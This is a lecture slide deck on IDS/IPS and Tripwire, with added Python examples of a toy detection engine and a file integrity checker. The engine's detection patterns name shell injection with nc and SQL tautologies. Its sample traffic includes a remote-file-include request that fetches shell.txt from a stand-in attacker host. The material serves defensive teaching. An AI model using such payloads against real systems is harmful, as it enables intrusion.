Agenda
• Introduction
• Intrusion & current threat scenario
• Introduction to IDS/IPS
• IDS/IPS detection techniques
• Main types of IDS/IPS
• Introduction to UTM
• Intrusion detection with Tripwire
• Summary
• References
• Q&A

What is Intrusion?
• A set of actions aimed at compromising the security goals (confidentiality, integrity, availability) of a computing or networking resource

Why need to protect? Current Threat Scenario
(Diagram slide: a USER surrounded by internal and external threats - malicious intent, blended threats, phishing, identity theft, malware, data corruption, botnets, information leak)

Why need to protect? (Cont..)
• There are two types of threats
 – External threats
 – Internal threats

Why need to protect? (Cont..)
• External threats (targeting individuals)
Who are the attackers?
• No longer lone individuals
• Attacks are executed as joint ventures among professional programmers with access to greater pooled resources
• Consortiums dedicated to the creation and distribution of malicious software intended to steal money from individuals

Why need to protect? (Cont..)
What are the motives?
• To gain attention
• Financial theft (the main driver of malware authors)
• Identity theft
Who are the victims?
• Small corporations
• Key individuals
• Basically anyone

Why need to protect? (Cont..)
• Internal threats
 – Insiders acting as initiators themselves or as conduits for other attacks
 – User ignorance
 – Malicious intent: intentional security breaches
 – Disgruntled employees

Why need to protect? (Cont..)
• Why can insider threats lead to more damage?
 – Employees hold valid authorization and have legitimate access to the organization's private information
 – Dishonest insiders can exploit an organization's vulnerabilities to commit identity fraud and expose confidential information, for personal gain or on behalf of organized crime
 – Insider attacks can be more difficult to detect than external penetration attempts, because the activity looks like normal authorized use

How to protect?
• There are two kinds of protection mechanism
 – Intrusion detection (IDS)
 – Intrusion prevention (IPS)

Introduction to IDS
• Intrusion detection system (IDS)
 – A system that automatically identifies and responds to intrusion activity

Introduction to IPS
• Intrusion prevention system (IPS)
 – A system that aims both to detect intrusions and to manage the responsive actions

Introduction to IPS (Cont..)
 – Technically, an IPS contains an IDS and combines it with preventive measures
 – An IPS uses IDS detection algorithms to monitor traffic and, sitting inline, drops or allows it based on that analysis
 – The "firewall" part of an IPS can prevent malicious traffic from entering or exiting the network

Basic assumptions for IDS/IPS
• Basic assumptions:
 – System activities are observable
 – Normal and intrusive activities leave distinct evidence
 – The goal of an IDS/IPS is to detect the difference

How IDS/IPS Works?
• The IPS monitors the network much like an IDS, but when an event occurs it takes action based on prescribed rules
• The security administrator defines those rules so that the system responds the way they want it to

How IDS/IPS Works? (Cont..)
(Diagram slide: IDS/IPS placement and traffic flow; not reproduced)

How IDS/IPS Works? (Cont..)
• Intrusion prevention can, in principle, be achieved through three main approaches
 – Building systems with no vulnerabilities
 – Taking perfect remediation steps: uncovering every vulnerability and patching it
 – Detecting exploit attempts and blocking them before serious damage is done (this is what an IPS product does; the first two are ideals that are never fully reached)

How IDS/IPS Protects?
• IPS technologies can respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which fall into the following groups
 – The IPS stops the attack itself
 – The IPS changes the security environment
 – The IPS changes the attack's content

How IDS/IPS Protects? (Cont..)
• The IPS stops the attack itself
 – Terminate the network connection or user session that is being used for the attack
 – Block access to the target from the offending user account, IP address, or other attacker attribute
 – Block all access to the targeted host, service, application, or other resource

How IDS/IPS Protects? (Cont..)
• The IPS changes the security environment
 – The IPS can change the configuration of other security controls to disrupt an attack
 – Common examples are reconfiguring a network device such as a firewall, router, or switch to block access from the attacker

How IDS/IPS Protects? (Cont..)
• The IPS changes the attack's content
 – IPS technologies can remove or replace malicious portions of an attack to make it benign
 – An example is an IPS that acts as a proxy, normalizes incoming requests, and permits only the cleaned data to reach its recipient

How IDS/IPS detects?
• Different approaches are used in an IPS to secure the network
 – Signature-based
 – Anomaly-based
 – Policy-based
 – Protocol-analysis-based
• These approaches are also used to classify IDS/IPS systems; the classification is called IDS/IPS by detection model

How IDS/IPS detects? (Cont...)
• Signature-based IPS
 – The approach most commonly used by IPS solutions
 – Signatures are loaded onto the device; each identifies a pattern that a known attack presents
 – For this reason it is also known as pattern matching
 – Signatures can be added, tuned, and updated to deal with new attacks
 – Caveat: it can only detect attacks for which a signature already exists, so novel or obfuscated attacks are missed until a signature is written

How IDS/IPS detects? (Cont...)
• Policy-based IPS
 – More concerned with enforcing the organization's security policy
 – Alarms are triggered when activity is detected that violates the security policy coded by the organization
 – With this approach the security policy itself is written into the IPS device

How IDS/IPS detects? (Cont...)
• Anomaly-based IPS
 – Also called profile-based
 – Attempts to discover activity that deviates from what an engineer defines as normal activity
 – Anomaly detection can be statistical or non-statistical
 – The statistical approach builds its notion of normal from the traffic patterns observed on the network itself; the non-statistical method relies on normal-behaviour information coded by the solution vendor
 – Caveat: a baseline learned while an attacker is already active treats the attack as normal, and legitimate changes in traffic show up as false positives

How IDS/IPS detects? (Cont...)
• Protocol-analysis-based IPS
 – Similar to the signature-based approach
 – Most signatures examine common settings; protocol analysis decodes the protocol itself and can therefore do much deeper packet inspection, which makes it more flexible in finding some types of attacks

IDS/IPS Detection Techniques
• Stateless
 – Most network-based IDSs currently available are stateless. They monitor and analyze all traffic in real time on a packet-by-packet basis, matching each packet against a database of known patterns
• Stateful
 – A stateful IDS can be defined as a packet filtering and analysis mechanism that makes its decision on the current packet AND information retained from previous packets (for example connection state); this is what it takes to spot an attack spread over many packets, such as a SYN flood
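The detection models and the stateless/stateful distinction above, as one added worked example (this is illustrative code written for this page, not code from the slides or from any real IDS/IPS product). The engine matches hypothetical signatures against the payload statelessly, enforces a hypothetical site policy on destination ports, keeps per-source state to catch a SYN flood that no single packet reveals, and applies a statistical anomaly threshold to per-source packet counts. The same engine runs as an IDS (alert only) and as an IPS (drop, then shun the source), which shows the difference in one place. Packets, signatures, thresholds and counts are all constructed sample data.

```python
"""Toy inline IDS/IPS engine combining the detection models on this page:
signature matching (stateless, per packet, over the payload), a policy rule,
stateful SYN-flood tracking across packets, and a statistical anomaly check.
Added example for illustration only; not code from the slides or from any
real IDS/IPS product. Packets, signatures and counts are constructed data.
"""
import re
import statistics
from collections import defaultdict

# Hypothetical signature database: (name, pattern over the payload bytes, IPS action).
# Stateless: each packet is judged on its own content, nothing is remembered.
SIGNATURES = [
    ("php-remote-file-include", re.compile(rb"\?.*=(https?|ftp)://", re.I), "drop"),
    ("shell-command-injection", re.compile(rb"[;|&]\s*(cat|id|nc)\b"), "drop"),
    ("sql-injection-tautology", re.compile(rb"'\s*or\s*'?1'?\s*=\s*'?1", re.I), "drop"),
]

# Hypothetical site policy coded into the device: only these destination ports may be used.
ALLOWED_PORTS = {53, 80, 443}

SYN_THRESHOLD = 5   # half-open connections per source before we call it a SYN flood
ANOMALY_K = 3.0     # flag a source whose packet count exceeds mean + K * stdev


class Engine:
    """prevent=True behaves as an IPS (drops/blocks); prevent=False as an IDS (alerts only)."""

    def __init__(self, prevent=True):
        self.prevent = prevent
        # Stateful memory: src -> set of (dst, dport) whose SYN has not been completed.
        self.half_open = defaultdict(set)
        self.blocked = set()  # sources the IPS has shunned ("block access from the attacker")

    def inspect(self, pkt):
        """Return (verdict, alert_names) for one packet dict."""
        src = pkt["src"]
        if src in self.blocked:
            return "drop", ["blocked-source"]
        alerts = []  # list of (name, requested action)

        # Policy-based: does the packet violate the coded site policy?
        if pkt["dport"] not in ALLOWED_PORTS:
            alerts.append(("policy-port-violation", "drop"))

        # Signature-based: stateless pattern match on the application payload.
        for name, pattern, action in SIGNATURES:
            if pattern.search(pkt.get("payload", b"")):
                alerts.append((name, action))

        # Stateful: count half-open connections per source across packets.
        key = (pkt["dst"], pkt["dport"])
        flags = pkt.get("flags", "")
        if flags == "S":
            self.half_open[src].add(key)
            if len(self.half_open[src]) >= SYN_THRESHOLD:
                alerts.append(("syn-flood", "block-source"))
        elif flags == "A":
            self.half_open[src].discard(key)

        verdict = "allow"
        if self.prevent:  # IPS: act on the requested actions; IDS only reports
            actions = {action for _, action in alerts}
            if "block-source" in actions:
                self.blocked.add(src)
            if actions:
                verdict = "drop"
        return verdict, [name for name, _ in alerts]


def anomalous_sources(counts, baseline):
    """Statistical anomaly detection: `baseline` holds per-source packet counts
    observed during a training window on this network; a source in `counts`
    is flagged when it exceeds mean + ANOMALY_K * stdev of that baseline."""
    mean = statistics.mean(baseline)
    stdev = statistics.pstdev(baseline) or 1.0
    limit = mean + ANOMALY_K * stdev
    return sorted(src for src, n in counts.items() if n > limit)


def run_sample():
    """Constructed traffic: a remote-file-include attempt, a clean request,
    a policy violation, then one source opening six half-open connections."""
    pkts = [
        {"src": "10.0.0.5", "dst": "10.0.0.1", "dport": 80, "flags": "PA",
         "payload": b"GET /index.php?page=http://evil.example/shell.txt HTTP/1.1"},
        {"src": "10.0.0.6", "dst": "10.0.0.1", "dport": 443, "flags": "PA",
         "payload": b"GET / HTTP/1.1"},
        {"src": "10.0.0.7", "dst": "10.0.0.1", "dport": 23, "flags": "S"},
    ]
    pkts += [{"src": "10.0.0.9", "dst": f"10.0.1.{i}", "dport": 80, "flags": "S"}
             for i in range(6)]
    ips, ids = Engine(prevent=True), Engine(prevent=False)
    return {
        "ips": [ips.inspect(p) for p in pkts],
        "ids": [ids.inspect(p) for p in pkts],
        "anomalies": anomalous_sources({"10.0.0.5": 12, "10.0.0.9": 40},
                                       baseline=[10, 12, 11, 9, 10, 13]),
    }


if __name__ == "__main__":
    for mode, results in run_sample().items():
        print(mode, results)
```

Note how the first four SYNs from 10.0.0.9 pass every stateless check; only the retained half-open set turns the fifth one into a syn-flood alert, and only in IPS mode does that alert change anything for the packets that follow. Real sensors also age out half-open entries and normalize the payload before matching, which this toy omits.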
IDS/IPS Detection Techniques (Cont..)
• Deep Packet Inspection
 – Deep packet inspection (DPI) is mostly used in NIDS to look inside the application payload of a packet or traffic stream, rather than only at the packet header fields, and to decide on the significance of that data based on its content
 – DPI technology can be effective against buffer overflow attacks, denial of service (DoS) attacks, sophisticated intrusions, and the small percentage of worms that fit within a single packet
 – Caveat: DPI sees nothing inside encrypted traffic unless the sensor terminates the TLS session or is given the keys

Main Types of IDS/IPS
• Scope-based IPS protection (or by location)
 – Host-based intrusion prevention system (HIPS)
 – Network-based intrusion prevention system (NIPS)

Host Based IDS/IPS
• Host-based IPS is a software program that resides on an individual system such as a server, workstation, or notebook
• Traffic flowing into or out of that particular system is inspected, and the behaviour of the applications and operating system may be examined for indications of an attack
• These host-specific programs or agents may protect just the operating system, or applications running on the host as well (for example web servers)

Host Based IDS/IPS (Cont..)
• When an attack is detected, the host IPS software either blocks the attack at the network interface level or issues commands to the application or operating system to stop the behaviour initiated by the attack
• It binds closely with the operating system kernel and services, monitoring and intercepting system calls to the kernel or APIs in order to prevent attacks as well as log them
• One potential disadvantage of this approach is that, given the necessarily tight integration with the host operating system, future operating system upgrades can break the agent

Benefits of Host IDS/IPS
• Protects mobile systems from attack when they are attached outside the protected network
• Prevents internal attack or misuse between devices on the same network segment; a network IPS only sees traffic moving between different segments
• Protects against encrypted attacks where the encrypted data stream terminates at the system being protected

Network Based IDS/IPS
• A network-based intrusion prevention system (NIPS) is a software or dedicated hardware system that connects directly to a network segment and protects all of the systems attached to the same or downstream network segments

Network Based IDS/IPS (Cont..)
• A NIPS has at least two network interfaces, one designated as internal and one as external
• As packets appear at either interface they are passed to the detection engine, at which point the IPS device functions much as any IDS would in determining whether or not the packet being examined poses a threat; because it sits inline it can drop the packet rather than only alert

Benefits of Network IDS/IPS
• Easy deployment: a single sensor can protect hundreds of systems
• A single control point for traffic can protect thousands of systems located downstream of the device, whatever their operating system or applications
• Protects against network DoS and DDoS attacks, SYN floods, etc.

Introduction of UTM
• Unified threat management (UTM) refers to a comprehensive security product that includes protection against multiple threats
• A UTM product typically includes a firewall, antivirus software, content filtering, and a spam filter in a single integrated package

Advantages of UTM
• Simplicity
• Streamlined installation and use
• Ability to update all the security functions or programs concurrently
• Eliminates the need for systems administrators to maintain multiple security programs over time

Disadvantages of UTM
• A UTM introduces a single point of failure for all of the network's security elements
• There is always the possibility of a performance constraint, since one device's hardware has to process so many applications and users simultaneously
• Cloud computing initiatives pose a further challenge: UTMs may have to be deployed in virtual form

Intrusion Detection with Tripwire
• Tripwire compares files and directories against a baseline database of file locations, modification dates, and other attributes
• It generates the baseline by taking a snapshot of the specified files and directories in a known secure state
• After creating the baseline database, Tripwire compares the current system to the baseline and reports any modifications, additions, or deletions

Tripwire Architecture
(Architecture diagram not reproduced)
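The baseline-then-compare workflow above, as an added worked example written for this page (it is not Tripwire's own code, and it stores the baseline as plain JSON where Tripwire uses its signed *.twd database). The snapshot records size, mtime, mode and a SHA-256 digest per file; the check reports added, removed and modified paths. The "system" being protected is a small directory tree constructed in a temporary directory, so the example runs offline.

```python
"""Tripwire-style file integrity checking: snapshot a directory tree into a
baseline of per-file attributes, then compare the live tree against it and
report additions, deletions and modifications. Added example to illustrate the
workflow on this page; it is not Tripwire's own code and uses a JSON file where
Tripwire uses its signed *.twd database. The directory tree is constructed in a
temporary directory so the example runs offline."""
import hashlib
import json
import tempfile
from pathlib import Path


def fingerprint(path):
    """Attributes recorded per file: size, mtime, mode and a SHA-256 digest.
    The digest matters because an intruder can restore size and mtime."""
    st = path.stat()
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {"size": st.st_size, "mtime": int(st.st_mtime),
            "mode": st.st_mode, "sha256": digest.hexdigest()}


def build_baseline(root):
    """Snapshot every regular file under root (to be taken in a known-good state)."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): fingerprint(p)
            for p in sorted(root.rglob("*")) if p.is_file() and not p.is_symlink()}


def save_baseline(baseline, dest):
    Path(dest).write_text(json.dumps(baseline, indent=1, sort_keys=True))


def load_baseline(src):
    return json.loads(Path(src).read_text())


def integrity_check(root, baseline):
    """Compare the live tree with the baseline; a file counts as modified when
    its content digest or its mode differs from the recorded value."""
    current = build_baseline(root)
    both = set(current) & set(baseline)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(f for f in both
                           if current[f]["sha256"] != baseline[f]["sha256"]
                           or current[f]["mode"] != baseline[f]["mode"]),
    }


def demo():
    """Constructed scenario: baseline a tiny 'system', then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "fs"
        (root / "bin").mkdir(parents=True)
        (root / "etc").mkdir()
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\necho original\n")
        (root / "etc" / "motd").write_text("Authorised users only\n")
        (root / "etc" / "passwd").write_text("root:x:0:0::/root:/bin/sh\n")

        # Equivalent of `tripwire --init`: the database lives outside the tree it describes.
        db = Path(tmp) / "baseline.json"
        save_baseline(build_baseline(root), db)

        # An intruder trojans a binary, drops a tool and removes the login banner.
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\necho trojaned\n")
        (root / "bin" / "nc").write_bytes(b"\x7fELF")
        (root / "etc" / "motd").unlink()

        # Equivalent of `tripwire --check`.
        return integrity_check(root, load_baseline(db))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The baseline is only worth as much as its own integrity: if an intruder can rewrite it, they can hide every change. Tripwire signs its database, configuration and policy with keys generated at install time for exactly this reason; a home-grown check like the one above should at least keep the baseline on read-only or off-host storage and run from a trusted binary.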
Tripwire Commands
• twinstall.sh - Run the configuration script (/etc/tripwire/twinstall.sh); it creates the site and local signing keys and signs the configuration and policy files
• tripwire --init - Initialize the database. The /var/lib/tripwire directory contains the Tripwire database of your system's files (*.twd) and a report directory where Tripwire reports are stored
• tripwire --check - Run an integrity check. Tripwire compares the current, actual file system objects with their properties as recorded in its database. Violations are printed to standard output

Tripwire Sample Report
(Sample report screenshot not reproduced)

Summary
• Due to the dynamic nature of network intrusion threats, deploying a mixture of both technologies (HIPS and NIPS) will provide the greatest level of protection for critical assets

References
• http://www.symantec.com/connect/articles/evolution-intrusiondetection-systems
• http://searchmidmarketsecurity.techtarget.com/sDefinition/0,,sid198_gci295031,00.html
• http://www.hig.no/index.php/content/download/8588/118736/file/Topic_1.ppt
• http://searchsecurity.techtarget.com/tip/0,289483,sid14_gci1092691,00.html
• http://idstutorial.com/anomaly-detection.php

Questions?